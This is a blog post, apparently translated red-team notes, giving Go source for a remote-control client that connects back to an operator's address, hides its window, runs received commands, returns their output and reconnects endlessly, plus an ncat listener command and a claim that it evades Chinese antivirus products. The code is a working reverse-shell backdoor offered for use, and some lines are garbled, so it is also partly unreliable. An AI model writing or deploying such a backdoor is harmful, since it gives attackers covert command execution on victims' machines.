A preliminary study on the remote control of go language in the red team notes

Hits: 0

The following is a simple demo written by the author to learn go and remote control. Client go, server Ncat, if you have time, you may continue to write the go server and improve some basic functions. If you are interested, you can pay attention to it.

Features:

  1. Socket connection establishment

  2. Command execution

  3. Message return

  4. Disconnect

package main

import (
    "bufio"
    "bytes"
    "context"
    "fmt"
    "github.com/axgle/mahonia"
    "io"
    "net"
    "os"
    "os/exec"
    "strings"
    "syscall"
    "time"
)


func ConnectServer ( address string ) {
     //establish a socket connection with the server 
    conn,err:=net.Dial( "tcp" ,address)
     if err != nil {
        fmt.Println( "Connection failed" )
         // Reconnect on failure 
        for {
            ConnectServer(address)
        }
    }
    //close stream
    defer conn.Close()
    //Start receiving server information 
    for {
         //Waiting to receive commands, ending with \n 
        message, err := bufio.NewReader(conn).ReadString( '\n' )
         if err == io.EOF {
             // Reconnect if server is disconnected
            conn.Close()
            ConnectServer(address)
        }
        //Remove useless characters 
        message1 := strings.Replace(message, "\n" , "" , -1 )
        cmdParameter := strings.Split(message1, " ")
        switch cmdParameter[0] {
        case "back":
            conn.Close()
            ConnectServer(address)
        case "exit":
            conn.Close()
            os.Exit(0)
        default:
            cmdSlice := cmdParameter[ 1 :len(cmdParameter)]
             //Call the execution command 
            out , err := Command(cmdParameter[ 0 ], cmdSlice...)
             if err != nil {
                 out = [] byte (err.Error( ) + "\n" )
            }
             Fix command line output encoding issues
            out1 :=ConvertToUTF8String(string(out),"gbk")

            conn.Write([]byte(out1))
        }
    }
}
func Command ( name string , arg ... string ) ( [] byte , error ) {
     // Create a context for a child node, which automatically times out after 30 seconds. 
    // Use the root Context to create a parent Context, and use the parent Context to create 2 Coroutine , timeout is set to 30 seconds 
    Timeout := 30 * time.Second
    ctxt, cancel := context.WithTimeout(context.Background(), Timeout)
    defer cancel()
     // Execute through context, set timeout 
    cmd : = exec.CommandContext(ctxt, name, arg...)
     //Hidden execution 
    cmd.SysProcAttr = &syscall.SysProcAttr{HideWindow: true }

    var buf bytes.Buffer
    cmd.Stdout = &buf
    cmd.Stderr = &buf

    if err := cmd.Start(); err != nil {
        return buf.Bytes(), err
    }
    if err := cmd.Wait(); err != nil {
        return buf.Bytes(), err
    }
    return buf.Bytes(), nil
}

func ConvertToUTF8String(src string, srcCode string) string {
    srcCoder := mahonia.NewDecoder(srcCode)
    srcResult := srcCoder.ConvertString(src)
    return srcResult
}
func main() {
     //Pass in the server's ip and port to let the remote control bind to 
    ConnectServer( "your IP: port" )
}

have a test:

  1. The server uses nc to listen on port 222

nc -lvvp 222

  1. Configure IP: port in the client main method and start the program

  2. Check whether the command can be executed (kill soft: a family bucket + a velvet)

You may also like...

Leave a Reply

Your email address will not be published.